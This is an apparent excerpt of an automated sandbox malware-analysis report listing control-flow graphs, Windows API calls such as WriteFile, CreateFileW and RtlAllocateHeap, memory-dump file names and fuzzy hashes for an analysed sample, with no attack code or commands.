                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,001A73C1,?,00195C43,?,?,?,00000000), ref: 001A7ACB
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,001A73C1,?,00195C43,?,?,?,00000000,?,?,?,?,?,001959E1,?,00195C43), ref: 001A7AF1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 442123175-0
                                                                                                                                                                                                                                        • Opcode ID: 92c36148ac229dac03e88b73fae1f8fa7b0c50d856f486ba0259c8a49b5e2b8e
                                                                                                                                                                                                                                        • Instruction ID: 3f4cf8f2ca871fdb03af8ce2f863f71907478087a4049e701dc57058ead3423f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92c36148ac229dac03e88b73fae1f8fa7b0c50d856f486ba0259c8a49b5e2b8e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98218035A04219ABCF15CF69DC909EDB7B9EB49301F1481AAE906D7291D730DF828B60

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 665 1a1462-1a1467 666 1a1469-1a1481 665->666 667 1a148f-1a1498 666->667 668 1a1483-1a1487 666->668 669 1a14aa 667->669 670 1a149a-1a149d 667->670 668->667 671 1a1489-1a148d 668->671 675 1a14ac-1a14b9 GetStdHandle 669->675 673 1a149f-1a14a4 670->673 674 1a14a6-1a14a8 670->674 672 1a1504-1a1508 671->672 672->666 678 1a150e-1a1511 672->678 673->675 674->675 676 1a14bb-1a14bd 675->676 677 1a14e6-1a14f8 675->677 676->677 679 1a14bf-1a14c8 GetFileType 676->679 677->672 680 1a14fa-1a14fd 677->680 679->677 681 1a14ca-1a14d3 679->681 680->672 682 1a14db-1a14de 681->682 683 1a14d5-1a14d9 681->683 682->672 684 1a14e0-1a14e4 682->684 683->672 684->672
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,001A1351,001BD978,0000000C), ref: 001A14AE
                                                                                                                                                                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,001A1351,001BD978,0000000C), ref: 001A14C0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3000768030-0
                                                                                                                                                                                                                                        • Opcode ID: 2df8a6ed0301980d3fdac0ae0b595688ecd09f2334d127e5ae8562e0dc4f3ba3
                                                                                                                                                                                                                                        • Instruction ID: d1dcd6281300347a624b0e5a98694dfb8bc1333da6ab40d9fdf0b10a8d8a3512
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2df8a6ed0301980d3fdac0ae0b595688ecd09f2334d127e5ae8562e0dc4f3ba3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D11E67AA08741AEDB344E7ECC88662BA95A79B331F39071DD0B7875F1C330D886D640

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 685 1a6463-1a647b call 1a6947 688 1a647d-1a6484 685->688 689 1a6491-1a64a7 SetFilePointerEx 685->689 690 1a648b-1a648f 688->690 691 1a64a9-1a64ba GetLastError call 199f30 689->691 692 1a64bc-1a64c6 689->692 693 1a64e2-1a64e5 690->693 691->690 692->690 695 1a64c8-1a64dd 692->695 695->693
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,001A631B,00000000,?,?,00000002,00000000), ref: 001A649F
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,001A631B,00000000,?,?,00000002,00000000,?,001A72FB,?,00000000,00000000,00000002,?,?), ref: 001A64AC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                        • Opcode ID: e7f0a729037540ca4d3057a5d0761c583cd84986e5966007981ac136c82793e0
                                                                                                                                                                                                                                        • Instruction ID: 8ab8b3e08d8047bcffecb37c01ffdb53895e73f82dff72a66bb74b1f088658ed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7f0a729037540ca4d3057a5d0761c583cd84986e5966007981ac136c82793e0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF01D677614615AFCF058F59DC45C9E3F69DB8A330B280208F8119B191E771ED81CBD0

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 697 1a6dc6-1a6dda call 1a6947 700 1a6ddc-1a6dde 697->700 701 1a6de0-1a6de8 697->701 702 1a6e2e-1a6e4e call 1a6ac4 700->702 703 1a6dea-1a6df1 701->703 704 1a6df3-1a6df6 701->704 712 1a6e60 702->712 713 1a6e50-1a6e5e call 199f30 702->713 703->704 705 1a6dfe-1a6e12 call 1a6947 * 2 703->705 706 1a6df8-1a6dfc 704->706 707 1a6e14-1a6e24 call 1a6947 CloseHandle 704->707 705->700 705->707 706->705 706->707 707->700 719 1a6e26-1a6e2c GetLastError 707->719 717 1a6e62-1a6e65 712->717 713->717 719->702
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,001A6F54,00000000,CF830579,001BDAB8,0000000C,001A6EDC,0019AD21,?), ref: 001A6E1C
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,001A6F54,00000000,CF830579,001BDAB8,0000000C,001A6EDC,0019AD21,?), ref: 001A6E26
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                        • Opcode ID: baad1f886caf67e5484b3c1e713cab814b7e69e3cc7c58d485d7e379f9f5f372
                                                                                                                                                                                                                                        • Instruction ID: 3119b3c248af431e61945cc7cff9ed5ba24463dc3d48272aaed33802ebe1a9d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baad1f886caf67e5484b3c1e713cab814b7e69e3cc7c58d485d7e379f9f5f372
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1112F3F7052245FCA266378EC4577E6B898B93774F2D0119F8149B1D3DB71CC808150

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 722 19bdf5-19be02 723 19be2c-19be40 call 1a30a3 722->723 724 19be04-19be27 call 19a772 722->724 730 19be42 723->730 731 19be45-19be4e call 1a6320 723->731 729 19bf93-19bf95 724->729 730->731 733 19be53-19be62 731->733 734 19be72-19be7b 733->734 735 19be64 733->735 738 19be7d-19be8a 734->738 739 19be8f-19bec3 734->739 736 19be6a-19be6c 735->736 737 19bf3c-19bf41 735->737 736->734 736->737 740 19bf91-19bf92 737->740 741 19bf8f 738->741 742 19bf20-19bf2c 739->742 743 19bec5-19becf 739->743 740->729 741->740 744 19bf2e-19bf35 742->744 745 19bf43-19bf46 742->745 746 19bed1-19bedd 743->746 747 19bef6-19bf02 743->747 744->737 749 19bf49-19bf51 745->749 746->747 750 19bedf-19bef1 call 19ba7f 746->750 747->745 748 19bf04-19bf1e call 19ba2e 747->748 748->749 752 19bf8d 749->752 753 19bf53-19bf59 749->753 750->740 752->741 757 19bf5b-19bf6f call 19bc2a 753->757 758 19bf71-19bf75 753->758 757->740 760 19bf88-19bf8a 758->760 761 19bf77-19bf85 call 1a9860 758->761 760->752 761->760
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 114db5304e680d80e849de9322c91a239e303fd165ff679084b4b79edfe59d1b
                                                                                                                                                                                                                                        • Instruction ID: 1d5a65d0aded249028efd558911976a577e487021ad39c84ee2f34d7fb1d9c5e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 114db5304e680d80e849de9322c91a239e303fd165ff679084b4b79edfe59d1b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6451D271A08208AFCF14CF58DDC5AA97FB5EF59324F258158F8099B252D331DE81CB91

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 765 1769f0-176a39 766 176a90-176a96 765->766 767 176a3b 765->767 769 176b6c-176b74 766->769 770 176a9c-176aa2 766->770 768 176a58-176a5e 767->768 772 176a75-176a8e call 18e85c 768->772 773 176a60-176a66 768->773 769->768 771 176b7a 769->771 774 176b59-176b61 770->774 775 176aa8-176aae 770->775 771->766 772->766 772->768 776 176a3d-176a4e 773->776 777 176a68-176a6e 773->777 774->768 779 176b67 774->779 780 176a50-176a56 775->780 781 176ab0-176ab7 775->781 776->780 777->780 782 176a70-176bd5 call 18e8c8 777->782 779->766 780->766 780->768 784 176abc-176ac1 781->784 785 176ac3-176ac8 784->785 786 176ae0-176ae5 784->786 788 176b20-176b3a 785->788 789 176aca-176acf 785->789 790 176ae7-176aeb call 18e85c 786->790 791 176b3e-176b43 786->791 788->785 797 176b3c 788->797 793 176ad5 789->793 794 176b7f-176bb6 789->794 801 176af0-176b0e 790->801 798 176bd6 call 176be0 791->798 799 176b49-176b4e 791->799 793->784 794->768 800 176bbc 794->800 797->786 805 176bdb-176c44 call 19a5d9 call 191ffc call 1925ed 798->805 799->784 803 176b54 799->803 800->766 801->785 804 176b10 801->804 803->805 804->786
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f2bda87b68a75bb22f590e567de4d0a3449bbecdd862b1809937ddddf3d0f4dc
                                                                                                                                                                                                                                        • Instruction ID: 9be971a5066b50d5ad85162ed1e1749394a48a74d2f841e74e632869bd1e9722
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2bda87b68a75bb22f590e567de4d0a3449bbecdd862b1809937ddddf3d0f4dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA4108B1A04B115BDF28A728C8C196E76F1DB58750F25C82EE85EEB312D732CC849783

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 812 18fb50-18fb6a 813 18fb6c-18fb6e 812->813 814 18fb73-18fb7b 812->814 815 18fc4a-18fc57 call 18e8c8 813->815 816 18fb7d-18fb87 814->816 817 18fb9f-18fba3 814->817 816->817 823 18fb89-18fb9a 816->823 819 18fba9-18fbba call 190413 817->819 820 18fc46 817->820 828 18fbbc-18fbc0 819->828 829 18fbc2-18fbf6 819->829 824 18fc49 820->824 827 18fc42-18fc44 823->827 824->815 827->824 830 18fc09 call 18f6bd 828->830 836 18fbf8-18fbfb 829->836 837 18fc19-18fc21 829->837 833 18fc0e-18fc12 830->833 833->827 834 18fc14-18fc17 833->834 834->827 836->837 840 18fbfd-18fc01 836->840 838 18fc23-18fc34 call 19c0d7 837->838 839 18fc36-18fc40 837->839 838->820 838->839 839->820 839->827 840->820 842 18fc03-18fc06 840->842 842->830
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: db4360d4835cc682baf16112480674b715af3748ce123a803823c850c247b74b
                                                                                                                                                                                                                                        • Instruction ID: 0a10fc2eb2aac2556436c13d6ff441e89d18e988914e40bf41eabcec4ba9bfda
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db4360d4835cc682baf16112480674b715af3748ce123a803823c850c247b74b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C631737290051E9BCB18EF64D490DEDB7B9BF19320B14027AE501A3690E731EB55CF90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                                                                                        • Opcode ID: 8f97480eba079ec47bbd3a65e67fbfe20aefeff7cc5028d9c450922ee45cee11
                                                                                                                                                                                                                                        • Instruction ID: ce5dd7f53273712136066b326f8917748bf3d51e9448ac2c338e7e52f6c3dc7f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f97480eba079ec47bbd3a65e67fbfe20aefeff7cc5028d9c450922ee45cee11
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11BC75A0420AAFCB05DF58E940D9B3BF8EF49304F104069F818AB302DB30EE11CBA4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3988221542-0
                                                                                                                                                                                                                                        • Opcode ID: 6ca3106014b38f2c9d92e43c74b9a5c3b185a62cf1df66f04b0d962316533130
                                                                                                                                                                                                                                        • Instruction ID: aeecd3c419ab4ab2964056d3561e66123571b520b1288a5c5ef4cd8a2aaafed0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ca3106014b38f2c9d92e43c74b9a5c3b185a62cf1df66f04b0d962316533130
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04F02B3250868A4ACF69BF38B975AAC7B60FF22338F20427ED412554D2DB124B53CF10
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0019FE5F,00000001,00000364,00000005,000000FF,?,00000000,?,00195765,00000000,25181615), ref: 001A0D05
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 45bbd6db662557c8fe1c18452310d31d9a66ab3f0994955f14a32ca1cc54c961
                                                                                                                                                                                                                                        • Instruction ID: f55532f426f6a9317e34b69f2268838b2c33a74e76cb5ecc93299e8927eac10b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45bbd6db662557c8fe1c18452310d31d9a66ab3f0994955f14a32ca1cc54c961
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FF0E93A640329679F235AE58D01B5A37489F5B770B254256FC08EA095CF70EC4086E1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,001A1945,000328EC,?,001A1945,00000220,?,0019A5E8,000328EC), ref: 0019F9EB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 03ecf1a2296bfdff923cd16a23b22869488105efe6b31ebe16f36f720582c7fc
                                                                                                                                                                                                                                        • Instruction ID: 072209592982a1a18fb2fd2feacdfce9c7df1c0c47839b0271c4e861639c4c28
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03ecf1a2296bfdff923cd16a23b22869488105efe6b31ebe16f36f720582c7fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86E09B3254121177DF3126659C05B6B364C9F513B4F250239BC59D64D0DF60DC0281E2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,001ADCE2,?,?,00000000,?,001ADCE2,00000000,0000000C), ref: 001AE05B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
